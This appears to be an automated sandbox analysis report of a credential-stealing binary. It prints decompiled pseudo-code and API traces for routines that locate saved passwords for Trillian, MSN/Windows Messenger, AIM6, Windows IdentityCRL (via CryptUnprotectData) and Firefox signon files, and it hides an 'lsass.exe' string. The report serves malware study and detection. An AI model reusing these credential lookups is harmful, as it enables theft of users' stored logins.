                                          • API ID: memsetstrlen$AddressProc$CurrentDirectoryFile$??2@??3@AttributesCloseHandleLibraryLoadSizememcpystrcmp
                                          • String ID: signons.txt$signons2.txt$signons3.txt
                                          • API String ID: 4081699353-561706229
                                          • Opcode ID: 7da170244c5e44e2ab2624a41fc5cd2ef5c298c791df7e28cb4a8979ce54e25b
                                          • Instruction ID: 377b3a65c9dd8df244cffc1a210365992fa2ecb4602db1b88cb694f2acf2e346
                                          • Opcode Fuzzy Hash: 7da170244c5e44e2ab2624a41fc5cd2ef5c298c791df7e28cb4a8979ce54e25b
                                          • Instruction Fuzzy Hash: C051C47280401CAACF11EA65DC85BCE7BACAF15319F5504BFF509F2181EB389B988B58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040D3A0, Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 109stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 60%
                                          			E0040D3A0(char* _a4) {
				void _v267;
				char _v268;
				void _v531;
				char _v532;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t20;
				int _t24;
				char _t28;
				void* _t39;
				char* _t56;
				char* _t60;
				char* _t62;
				char* _t63;
				void* _t64;

				_t56 = _a4;
				 *_t56 = 0;
				_v268 = 0;
				_t20 = memset( &_v267, 0, 0x104);
				_t60 =  &_v268;
				0x411dae(0x80000002, "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Trillian", "UninstallString", 0x104); // executed
				if(_t20 != 0) {
					_t39 = E00407139(0, "trillian.exe");
					if(_t39 > 0) {
						 *((char*)(_t64 + _t39 - 0x109)) = 0;
						if(E004069D3(_t60) != 0) {
							0x413d0c(_t56, _t60);
						}
					}
				}
				if( *_t56 == 0) {
					_v268 = 0;
					0x41212c(); // executed
					_t63 =  &_v268;
					E0040680E(_t63);
					E00406958(0x104, _t63, "trillian");
					if(E004069D3(_t63) != 0) {
						0x413d0c(_a4, _t63);
					}
				}
				_v532 = 0;
				memset( &_v531, 0, 0x104);
				0x41223f(0x1a); // executed
				_t62 = _a4 + 0x105;
				_t24 = strlen("Trillian\users\global");
				_t17 = strlen( &_v532) + 1; // 0x1
				if(_t24 + _t17 >= 0x104) {
					 *_t62 = 0;
				} else {
					E00406B4B(_t62,  &_v532, "Trillian\users\global");
				}
				_t28 = E004069D3(_t62);
				if(_t28 == 0) {
					 *_t62 = _t28;
					return _t28;
				}
				return _t28;
			}



















                                          0x0040d3ac
                                          0x0040d3be
                                          0x0040d3c1
                                          0x0040d3c8
                                          0x0040d3dd
                                          0x0040d3e3
                                          0x0040d3ed
                                          0x0040d3f8
                                          0x0040d400
                                          0x0040d402
                                          0x0040d415
                                          0x0040d41b
                                          0x0040d421
                                          0x0040d415
                                          0x0040d400
                                          0x0040d425
                                          0x0040d42d
                                          0x0040d434
                                          0x0040d439
                                          0x0040d43f
                                          0x0040d44b
                                          0x0040d45c
                                          0x0040d464
                                          0x0040d46a
                                          0x0040d45c
                                          0x0040d475
                                          0x0040d47c
                                          0x0040d48a
                                          0x0040d497
                                          0x0040d49d
                                          0x0040d4b0
                                          0x0040d4b9
                                          0x0040d4d2
                                          0x0040d4bb
                                          0x0040d4c9
                                          0x0040d4cf
                                          0x0040d4d6
                                          0x0040d4de
                                          0x0040d4e0
                                          0x00000000
                                          0x0040d4e0
                                          0x0040d4e6

                                          APIs
                                          • memset.MSVCRT ref: 0040D3C8
                                            • Part of subcall function 00411DAE: RegCloseKey.ADVAPI32(00000000,?,00000000,00000000), ref: 00411DE3
                                          • _mbscpy.MSVCRT ref: 0040D41B
                                          • _mbscpy.MSVCRT ref: 0040D464
                                          • memset.MSVCRT ref: 0040D47C
                                          • strlen.MSVCRT ref: 0040D49D
                                          • strlen.MSVCRT ref: 0040D4AB
                                            • Part of subcall function 00407139: strlen.MSVCRT ref: 0040714B
                                            • Part of subcall function 00407139: strlen.MSVCRT ref: 00407153
                                            • Part of subcall function 00407139: _memicmp.MSVCRT ref: 00407171
                                            • Part of subcall function 004069D3: GetFileAttributesA.KERNELBASE(0040390F,0040D4DB,0040390F,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004069D7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: strlen$_mbscpymemset$AttributesCloseFile_memicmp
                                          • String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Trillian$Trillian\users\global$UninstallString$trillian$trillian.exe
                                          • API String ID: 2174551368-3003071570
                                          • Opcode ID: e259f277b1496aa0bd8dd7d471ad79ad235791e513a4ae2e0a80bbcb3c597bbd
                                          • Instruction ID: 7bc3b858bee9d9e9ac8f81dd2a2494a9b2267e2ac629f59b21fbbbeb3bb54d2f
                                          • Opcode Fuzzy Hash: e259f277b1496aa0bd8dd7d471ad79ad235791e513a4ae2e0a80bbcb3c597bbd
                                          • Instruction Fuzzy Hash: 72312B7290421469E720AA659C46BDF3B988F11715F20007FF548F71C2DEBCAAC487AD
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004103F1, Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 99registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,73AFF420,00000000,?,0040DCC1,?), ref: 0041041E
                                          • RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,73AFF420,00000000,?,0040DCC1,?), ref: 00410436
                                          • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,73AFF420,00000000,?,0040DCC1), ref: 0041045F
                                          • RegCloseKey.ADVAPI32(?,?,73AFF420,00000000,?,0040DCC1), ref: 00410509
                                            • Part of subcall function 00404C9D: LoadLibraryA.KERNELBASE(crypt32.dll,00000000,00404771,?,?), ref: 00404CAA
                                            • Part of subcall function 00404C9D: GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00404CBC
                                          • memcpy.MSVCRT ref: 004104C8
                                          • memcpy.MSVCRT ref: 004104DD
                                            • Part of subcall function 004100A4: RegOpenKeyExA.ADVAPI32(004104FD,Creds,00000000,00020019,004104FD,00000040,0041B008,?,?,004104FD,?,?,?,?), ref: 004100C8
                                            • Part of subcall function 004100A4: memset.MSVCRT ref: 004100EA
                                            • Part of subcall function 004100A4: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 004101E7
                                            • Part of subcall function 004100A4: RegCloseKey.ADVAPI32(?), ref: 004101F8
                                          • LocalFree.KERNEL32(0040DCC1,73AFF420,?,?,?,73AFF420,00000000), ref: 00410500
                                          • RegCloseKey.KERNELBASE(?,?,73AFF420,00000000,?,0040DCC1,?), ref: 00410512
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                          • String ID: Dynamic Salt$Software\Microsoft\IdentityCRL$Value
                                          • API String ID: 2768085393-888555734
                                          • Opcode ID: d648e9b0c95eff2677d72af7b673b930fecaf3740d0545a91529973bbe74cb9a
                                          • Instruction ID: a3322e4f6880ec2e25c1dd16e8e651f617ea5ab7975a499ff40f994b3e8bdadf
                                          • Opcode Fuzzy Hash: d648e9b0c95eff2677d72af7b673b930fecaf3740d0545a91529973bbe74cb9a
                                          • Instruction Fuzzy Hash: B631E7B690011DABDB119B95EC45EEFBBBDEF48348F004066FA05F2111E7749A848BA8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00413E10, Relevance: 18.1, APIs: 12, Instructions: 128COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                          • String ID:
                                          • API String ID: 3662548030-0
                                          • Opcode ID: 632bd22da57b14eafad8c86f7debf7b27b33ce24f3ab1356985adfa30974a25f
                                          • Instruction ID: 1a0d48d648a4d99901fb7feaec5c467672ee51f091280c2f058e756afb183587
                                          • Opcode Fuzzy Hash: 632bd22da57b14eafad8c86f7debf7b27b33ce24f3ab1356985adfa30974a25f
                                          • Instruction Fuzzy Hash: 9841A071D00309DFDB209FA4D884AEE7BB4FB08715F20416BE46197291D7784AC2CB5C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040DA79, Relevance: 17.7, APIs: 4, Strings: 6, Instructions: 198registryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 40%
                                          			E0040DA79(intOrPtr* _a4) {
				void* _v12;
				int _v16;
				intOrPtr _v20;
				void* _v24;
				intOrPtr _v28;
				int _v32;
				int _v36;
				int _v40;
				intOrPtr _v48;
				char _v52;
				int _v56;
				int _v60;
				char _v64;
				intOrPtr _v76;
				int _v84;
				int _v88;
				int _v344;
				int _v600;
				char _v856;
				char _v1112;
				void* __ebx;
				void* __edi;
				void* __esi;
				char* _t73;
				long _t75;
				void** _t76;
				long _t78;
				long _t80;
				char* _t81;
				long _t83;
				char* _t84;
				int _t96;
				int _t115;
				int* _t132;
				int* _t134;
				int* _t136;

				_t115 = 0;
				_v20 = 1;
				_v76 = 0x418ad8;
				_v64 = 0;
				_v56 = 0;
				_v60 = 0;
				0x40fd01();
				_v16 = 0;
				do {
					if(_v16 != _t115) {
						if(_v16 != 1) {
							_t73 =  &_v1112;
							0x40ff88(_t73); // executed
						} else {
							_t75 = RegOpenKeyExA(0x80000001, "Software\Microsoft\MessengerService", _t115, 0x20019,  &_v12); // executed
							if(_t75 != 0) {
								goto L5;
							} else {
								_t76 =  &_v12;
								goto L4;
							}
						}
					} else {
						_t78 = RegOpenKeyExA(0x80000001, "Software\Microsoft\MSNMessenger", _t115, 0x20019,  &_v24); // executed
						if(_t78 != 0) {
							L5:
							_t73 = 0;
						} else {
							_t76 =  &_v24;
							L4:
							_t73 =  &_v1112;
							0x40fe5d(_t73, _t76);
						}
					}
					if(_t73 != _t115) {
						_v600 = _t115;
						_v344 = _t115;
						_v88 = _t115;
						_v84 = _t115;
						E00406958(0xff,  &_v344,  &_v856);
						_t132 =  &_v600;
						E00406958(0xff, _t132,  &_v1112);
						_v84 = 1;
						_v88 = 1;
						 *((intOrPtr*)( *_a4))(_t132);
						_t115 = 0;
					}
					_v16 = _v16 + 1;
				} while (_v16 < 3);
				_t80 = RegOpenKeyExA(0x80000001, "Software\Microsoft\MessengerService", _t115, 0x20019,  &_v12); // executed
				if(_t80 != 0) {
					_t81 = 0;
				} else {
					_t81 =  &_v1112;
					0x40fd2e("UserMicrosoft RTC Instant Messaging", "PasswordMicrosoft RTC Instant Messaging", _t81,  &_v12);
				}
				if(_t81 != _t115) {
					_v600 = _t115;
					_v344 = _t115;
					_v88 = _t115;
					_v84 = _t115;
					E00406958(0xff,  &_v344,  &_v856);
					_t136 =  &_v600;
					E00406958(0xff, _t136,  &_v1112);
					_v84 = 9;
					_v88 = 0xa;
					_v20 =  *((intOrPtr*)( *_a4))(_t136);
					_t115 = 0;
				}
				_t83 = RegOpenKeyExA(0x80000001, "Software\Microsoft\MessengerService", _t115, 0x20019,  &_v12); // executed
				if(_t83 != 0) {
					_t84 = 0;
				} else {
					_t84 =  &_v1112;
					0x40fd2e("UserMicrosoft Exchange Instant Messaging", "PasswordMicrosoft Exchange Instant Messaging", _t84,  &_v12);
				}
				if(_t84 != _t115) {
					_v600 = _t115;
					_v344 = _t115;
					_v88 = _t115;
					_v84 = _t115;
					E00406958(0xff,  &_v344,  &_v856);
					_t134 =  &_v600;
					E00406958(0xff, _t134,  &_v1112);
					_t96 = 0xa;
					_v84 = _t96;
					_v88 = _t96;
					_v20 =  *((intOrPtr*)( *_a4))(_t134);
					_t115 = 0;
				}
				_v28 = _a4;
				_v40 = _t115;
				_v32 = _t115;
				_v36 = _t115;
				_v52 = 0x418ae0;
				0x4103f1( &_v52); // executed
				0x410205( &_v52);
				if(_v48 == _t115) {
					0x410383( &_v52); // executed
				}
				E00404CE0( &_v40);
				E00404CE0( &_v64);
				return _v20;
			}







































                                          0x0040da84
                                          0x0040da8d
                                          0x0040da94
                                          0x0040da9b
                                          0x0040da9e
                                          0x0040daa1
                                          0x0040daa4
                                          0x0040daaf
                                          0x0040dab2
                                          0x0040dab5
                                          0x0040daeb
                                          0x0040db0c
                                          0x0040db13
                                          0x0040daed
                                          0x0040db01
                                          0x0040db05
                                          0x00000000
                                          0x0040db07
                                          0x0040db07
                                          0x00000000
                                          0x0040db07
                                          0x0040db05
                                          0x0040dab7
                                          0x0040dacb
                                          0x0040dacf
                                          0x0040dae3
                                          0x0040dae3
                                          0x0040dad1
                                          0x0040dad1
                                          0x0040dad4
                                          0x0040dad5
                                          0x0040dadc
                                          0x0040dadc
                                          0x0040dacf
                                          0x0040db1a
                                          0x0040db22
                                          0x0040db28
                                          0x0040db2e
                                          0x0040db31
                                          0x0040db40
                                          0x0040db4d
                                          0x0040db53
                                          0x0040db61
                                          0x0040db64
                                          0x0040db6a
                                          0x0040db6c
                                          0x0040db6c
                                          0x0040db6e
                                          0x0040db71
                                          0x0040db8f
                                          0x0040db93
                                          0x0040dbb1
                                          0x0040db95
                                          0x0040db99
                                          0x0040dbaa
                                          0x0040dbaa
                                          0x0040dbb5
                                          0x0040dbbd
                                          0x0040dbc3
                                          0x0040dbc9
                                          0x0040dbcc
                                          0x0040dbdb
                                          0x0040dbe8
                                          0x0040dbee
                                          0x0040dbfc
                                          0x0040dc03
                                          0x0040dc0c
                                          0x0040dc0f
                                          0x0040dc0f
                                          0x0040dc25
                                          0x0040dc29
                                          0x0040dc47
                                          0x0040dc2b
                                          0x0040dc2f
                                          0x0040dc40
                                          0x0040dc40
                                          0x0040dc4b
                                          0x0040dc53
                                          0x0040dc59
                                          0x0040dc5f
                                          0x0040dc62
                                          0x0040dc71
                                          0x0040dc7e
                                          0x0040dc84
                                          0x0040dc8f
                                          0x0040dc92
                                          0x0040dc95
                                          0x0040dc9d
                                          0x0040dca0
                                          0x0040dca0
                                          0x0040dca5
                                          0x0040dcac
                                          0x0040dcaf
                                          0x0040dcb2
                                          0x0040dcb5
                                          0x0040dcbc
                                          0x0040dcc5
                                          0x0040dccd
                                          0x0040dcd3
                                          0x0040dcd3
                                          0x0040dcdb
                                          0x0040dce3
                                          0x0040dcef

                                          APIs
                                            • Part of subcall function 0040FD01: memset.MSVCRT ref: 0040FD18
                                            • Part of subcall function 0040FD01: memset.MSVCRT ref: 0040FD21
                                          • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\MSNMessenger,00000000,00020019,?), ref: 0040DACB
                                            • Part of subcall function 0040FF88: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,00000000,?,?,?), ref: 0041005B
                                            • Part of subcall function 0040FF88: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,00000000,?,?,?), ref: 00410071
                                            • Part of subcall function 0040FF88: LocalFree.KERNEL32(?,?,00000000,?,?,?), ref: 0041007D
                                          • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\MessengerService,00000000,00020019,?), ref: 0040DB01
                                          • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\MessengerService,00000000,00020019,?,?), ref: 0040DB8F
                                          • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\MessengerService,00000000,00020019,?), ref: 0040DC25
                                          Strings
                                          • Software\Microsoft\MessengerService, xrefs: 0040DAF7, 0040DB85, 0040DC1B
                                          • Software\Microsoft\MSNMessenger, xrefs: 0040DAC1
                                          • PasswordMicrosoft Exchange Instant Messaging, xrefs: 0040DC36
                                          • UserMicrosoft RTC Instant Messaging, xrefs: 0040DBA5
                                          • PasswordMicrosoft RTC Instant Messaging, xrefs: 0040DBA0
                                          • UserMicrosoft Exchange Instant Messaging, xrefs: 0040DC3B
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: Open$ByteCharMultiWidememset$FreeLocal
                                          • String ID: PasswordMicrosoft Exchange Instant Messaging$PasswordMicrosoft RTC Instant Messaging$Software\Microsoft\MSNMessenger$Software\Microsoft\MessengerService$UserMicrosoft Exchange Instant Messaging$UserMicrosoft RTC Instant Messaging
                                          • API String ID: 3472595403-3472580514
                                          • Opcode ID: 4a20be75106eef8afbc2690363f5f718c8396ca202439f642d4b7149e4ddfd6d
                                          • Instruction ID: 22d36e33a130c3ca974138f2eaaf9dbe6720f3348f6af52b077c8fd119907347
                                          • Opcode Fuzzy Hash: 4a20be75106eef8afbc2690363f5f718c8396ca202439f642d4b7149e4ddfd6d
                                          • Instruction Fuzzy Hash: CD711BB1D0025DAFDB10DFD5CD84AEEBBB8AB48309F5000BBE505B6241D7786A898B58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040BBF0, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 82stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 65%
                                          			E0040BBF0(void* __eax, intOrPtr _a4) {
				void _v267;
				char _v268;
				char _v531;
				char _v792;
				intOrPtr _v796;
				char _v800;
				void* __ebx;
				void* __edi;
				void* __esi;
				char* _t31;
				WINDOWPLACEMENT* _t43;
				void* _t45;
				char* _t49;
				struct HWND__* _t50;
				intOrPtr _t52;
				int _t56;

				_t45 = __eax;
				_v268 = 0;
				memset( &_v267, 0, 0x104);
				GetModuleFileNameA(0,  &_v268, 0x104);
				_t31 = strrchr( &_v268, 0x2e);
				if(_t31 != 0) {
					 *_t31 = 0;
				}
				0x413cf4( &_v268, ".cfg");
				_v796 = _a4;
				_v800 = 0x419084;
				_v792 = 0;
				_v531 = 0;
				0x413d0c( &_v792,  &_v268);
				0x413d0c( &_v531, "General");
				E004039A8( *((intOrPtr*)(_t45 + 0x38c)),  &_v800); // executed
				_t52 = _v796;
				_t56 = 0x2c;
				if(_t52 != 0) {
					_t50 =  *(_t45 + 0x108);
					if(_t50 != 0) {
						_t43 = _t45 + 0x144;
						_t43->length = _t56;
						GetWindowPlacement(_t50, _t43);
					}
				}
				_t49 =  &_v800;
				 *((intOrPtr*)(_v800 + 0xc))("WinPos", _t45 + 0x144, _t56);
				if(_t52 == 0) {
					E00402D81(_t45);
				}
				return E0040946F( *((intOrPtr*)(_t45 + 0x390)), _t49,  &_v800);
			}



















                                          0x0040bc02
                                          0x0040bc0d
                                          0x0040bc14
                                          0x0040bc26
                                          0x0040bc35
                                          0x0040bc3e
                                          0x0040bc40
                                          0x0040bc40
                                          0x0040bc4f
                                          0x0040bc57
                                          0x0040bc6b
                                          0x0040bc75
                                          0x0040bc7c
                                          0x0040bc83
                                          0x0040bc94
                                          0x0040bca8
                                          0x0040bcad
                                          0x0040bcb7
                                          0x0040bcb8
                                          0x0040bcba
                                          0x0040bcc2
                                          0x0040bcc4
                                          0x0040bccc
                                          0x0040bcce
                                          0x0040bcce
                                          0x0040bcc2
                                          0x0040bce7
                                          0x0040bced
                                          0x0040bcf2
                                          0x0040bcf4
                                          0x0040bcf4
                                          0x0040bd0e

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                          • String ID: .cfg$General$WinPos
                                          • API String ID: 1012775001-3165880290
                                          • Opcode ID: a0e6ba106d22b7fdb452a0395d51e5079dfe080821a02a89f5daf1cda0cefaef
                                          • Instruction ID: 4d3526ff516950935d38684931a8ffa2e994efc3bce567aa6e3141678cacb11c
                                          • Opcode Fuzzy Hash: a0e6ba106d22b7fdb452a0395d51e5079dfe080821a02a89f5daf1cda0cefaef
                                          • Instruction Fuzzy Hash: AC31B4729042189BDB11DB55DC45BCA77BC9F58704F0400FAE948AB282DBB45FC58FA8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040260A, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 93registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegOpenKeyExW.KERNELBASE(80000001,Software\America Online\AIM6\Passwords,00000000,00020019,?), ref: 00402638
                                          • memset.MSVCRT ref: 0040265A
                                          • memset.MSVCRT ref: 00402676
                                          • wcscpy.MSVCRT ref: 004026BD
                                          • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,?,?,?), ref: 0040271B
                                          • RegCloseKey.ADVAPI32(?), ref: 00402724
                                          Strings
                                          • Software\America Online\AIM6\Passwords, xrefs: 0040262E
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memset$CloseEnumOpenValuewcscpy
                                          • String ID: Software\America Online\AIM6\Passwords
                                          • API String ID: 295685061-818317896
                                          • Opcode ID: a6e0e670a062fae4d46a71794003c79dd6e3f5cc49125a91a21113afdc381c0b
                                          • Instruction ID: 88eb4c74892045a3a61c352dacbb2536a85d96596cfce7057c4216d26753dbed
                                          • Opcode Fuzzy Hash: a6e0e670a062fae4d46a71794003c79dd6e3f5cc49125a91a21113afdc381c0b
                                          • Instruction Fuzzy Hash: F5311AB284011DAACB10DF91DC45EEFBBBCEF08344F1040A6A609F2180E77497998FA9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004039A8, Relevance: 12.1, APIs: 3, Strings: 5, Instructions: 89COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 46%
                                          			E004039A8(void* __edi, intOrPtr* __esi) {
				void _v259;
				char _v260;
				char _v2088;
				void* _t40;
				void* _t44;
				void* _t47;
				intOrPtr* _t68;
				void* _t69;
				void* _t70;

				_t68 = __esi;
				_t70 = _t69 - 0x824;
				_t47 = 0;
				_push(0);
				_push(__edi + 0x728);
				_push("ShowGridLines");
				 *((intOrPtr*)( *__esi + 4))();
				_push(0);
				_push(__edi + 0x72c);
				_push("SaveFilterIndex");
				 *((intOrPtr*)( *__esi + 8))();
				_push(0);
				_push(__edi + 0x730);
				_push("AddExportHeaderLine");
				 *((intOrPtr*)( *__esi + 4))();
				_push(0);
				_push(__edi + 0x734);
				_push("MarkOddEvenRows");
				 *((intOrPtr*)( *__esi + 4))();
				E0040D725(E0040D339( &_v2088), 0);
				do {
					_v260 = 0;
					memset( &_v259, 0, 0xfe);
					_push(_t47);
					sprintf( &_v260, "Folder%d");
					_t70 = _t70 + 0x18;
					if( *((intOrPtr*)(_t68 + 4)) == 0) {
						L4:
						_t40 =  *((intOrPtr*)( *_t68 + 0x10))( &_v260, E0040D362(_t47), E0040D362(_t47), 0x104);
					} else {
						_t44 = E0040D362(_t47);
						0x413dce(_t44, E0040D362(_t47));
						if(_t44 != 0) {
							goto L4;
						} else {
							_t40 =  *((intOrPtr*)( *_t68 + 0x1c))( &_v260);
						}
					}
					_t47 = _t47 + 1;
				} while (_t47 < 7);
				return _t40;
			}












                                          0x004039a8
                                          0x004039ad
                                          0x004039b4
                                          0x004039b6
                                          0x004039bd
                                          0x004039be
                                          0x004039c5
                                          0x004039ca
                                          0x004039d1
                                          0x004039d2
                                          0x004039d9
                                          0x004039de
                                          0x004039e5
                                          0x004039e6
                                          0x004039ed
                                          0x004039f2
                                          0x004039f9
                                          0x004039fa
                                          0x00403a01
                                          0x00403a0f
                                          0x00403a14
                                          0x00403a22
                                          0x00403a29
                                          0x00403a2e
                                          0x00403a3b
                                          0x00403a40
                                          0x00403a47
                                          0x00403a7c
                                          0x00403aa4
                                          0x00403a49
                                          0x00403a5b
                                          0x00403a61
                                          0x00403a6a
                                          0x00000000
                                          0x00403a6c
                                          0x00403a77
                                          0x00403a77
                                          0x00403a6a
                                          0x00403aa7
                                          0x00403aa8
                                          0x00403ab3

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: _strcmpimemsetsprintf
                                          • String ID: AddExportHeaderLine$Folder%d$MarkOddEvenRows$SaveFilterIndex$ShowGridLines
                                          • API String ID: 1148023869-3238971583
                                          • Opcode ID: 41c6a4aa87f640e3ff617832b964f26cfa69aff41829c8ca8a21bee419e69aaf
                                          • Instruction ID: b4f0ac16e309dff731b59d997bf236358cc0e702142a5422807362b934f22301
                                          • Opcode Fuzzy Hash: 41c6a4aa87f640e3ff617832b964f26cfa69aff41829c8ca8a21bee419e69aaf
                                          • Instruction Fuzzy Hash: A22143717041046BCB19DFA8CC86FAAB7F8BF08705F14446EB44A97181EA78AE848B59
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040FA34, Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 98stringCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0040FC4F: memset.MSVCRT ref: 0040FC6B
                                            • Part of subcall function 0040FC4F: memset.MSVCRT ref: 0040FC82
                                            • Part of subcall function 0040FC4F: _mbscat.MSVCRT ref: 0040FCAD
                                            • Part of subcall function 0040FC4F: _mbscat.MSVCRT ref: 0040FCD5
                                          • memset.MSVCRT ref: 0040FA77
                                          • strlen.MSVCRT ref: 0040FA8E
                                          • strlen.MSVCRT ref: 0040FA97
                                          • strlen.MSVCRT ref: 0040FAF0
                                          • strlen.MSVCRT ref: 0040FAFE
                                            • Part of subcall function 00406B4B: _mbscpy.MSVCRT ref: 00406B53
                                            • Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: strlen$_mbscatmemset$_mbscpy
                                          • String ID: history.dat$places.sqlite
                                          • API String ID: 29466866-467022611
                                          • Opcode ID: 6d4fa157046b79324614db1c5231b71ecc17b726e83c5fbb59575d794b89b698
                                          • Instruction ID: 51ac12969def4fbc614ccf7375ed6982ef447687ff00d0a07234f36c10d15357
                                          • Opcode Fuzzy Hash: 6d4fa157046b79324614db1c5231b71ecc17b726e83c5fbb59575d794b89b698
                                          • Instruction Fuzzy Hash: 7A313271D05118ABDB10EBA5DC85BDDBBB89F01319F1044BBE514F2181DB38AB89CB59
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004043E4, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 81COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 42%
                                          			E004043E4() {
				char _v11;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				char _v17;
				char _v18;
				char _v19;
				char _v20;
				void _v283;
				char _v284;
				void _v556;
				void* __edi;
				void* __esi;
				void _t33;
				char* _t42;

				_v284 = 0;
				memset( &_v283, 0, 0x104);
				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				asm("stosb");
				if( *0x41e568 == 0) {
					 *0x41e670 = GetSystemDirectoryA(0x41e568, 0x104);
				}
				0x413d0c( &_v284, 0x41e568);
				E0040680E( &_v284);
				if(E004028E7() == 0) {
					_v11 = 0;
					_v18 = 0x61;
					_v15 = 0x2e;
					_v14 = 0x65;
					_v16 = 0x73;
					_v12 = 0x65;
					_v20 = 0x6c;
					_v17 = 0x73;
					_v19 = 0x73;
					_v13 = 0x78;
				}
				_t17 =  &_v20; // 0x6c
				_t42 =  &_v284;
				E00406EFE(_t42, _t17);
				0x411147();
				 *0x41e010 = 0; // executed
				0x411560(_t42); // executed
				if( *0x41e010 == 0) {
					L7:
					return 0;
				}
				memcpy( &_v556, 0x41df00, 0x10c);
				if( *0x41e010 == 0) {
					goto L7;
				}
				_t33 = _v556;
				if(_t33 == 0) {
					goto L7;
				}
				return _t33;
			}




















                                          0x00404400
                                          0x00404406
                                          0x0040440d
                                          0x00404413
                                          0x00404414
                                          0x00404415
                                          0x00404416
                                          0x00404421
                                          0x00404427
                                          0x00404431
                                          0x00404431
                                          0x0040443e
                                          0x0040444b
                                          0x00404457
                                          0x00404459
                                          0x0040445c
                                          0x00404460
                                          0x00404464
                                          0x00404468
                                          0x0040446c
                                          0x00404470
                                          0x00404474
                                          0x00404478
                                          0x0040447c
                                          0x0040447c
                                          0x00404480
                                          0x00404484
                                          0x0040448a
                                          0x00404490
                                          0x00404498
                                          0x0040449e
                                          0x004044aa
                                          0x004044d7
                                          0x00000000
                                          0x004044d7
                                          0x004044bd
                                          0x004044cb
                                          0x00000000
                                          0x00000000
                                          0x004044cd
                                          0x004044d5
                                          0x00000000
                                          0x00000000
                                          0x004044dd

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: DirectorySystem_mbscpymemcpymemset
                                          • String ID: hA$lsass.exe
                                          • API String ID: 3651535325-1783533361
                                          • Opcode ID: 6d5ed3b0d0452b9c5b04e8167ed8392422c7da7f8cf5eefbc91479cdc521e7d4
                                          • Instruction ID: 0e5f66d5a96f37e034b058b5e8cd5d15c838e509caf2427c45d960fa31638fa3
                                          • Opcode Fuzzy Hash: 6d5ed3b0d0452b9c5b04e8167ed8392422c7da7f8cf5eefbc91479cdc521e7d4
